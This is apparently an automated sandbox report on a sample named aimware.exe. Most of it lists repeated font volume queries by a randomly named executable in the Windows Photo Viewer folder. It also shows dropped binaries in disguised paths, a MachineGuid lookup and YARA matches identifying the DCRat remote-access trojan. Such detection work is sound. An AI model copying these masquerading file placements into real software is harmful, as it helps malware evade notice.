Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe VolumeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe VolumeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe VolumeInformation
Source: C:\Recovery\spoolsv.exe	Queries volume information: C:\Recovery\spoolsv.exe VolumeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe VolumeInformation
Source: C:\Recovery\spoolsv.exe	Queries volume information: C:\Recovery\spoolsv.exe VolumeInformation

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ACDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00ACDF1E

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ABB146 GetVersionExW,

0_2_00ABB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
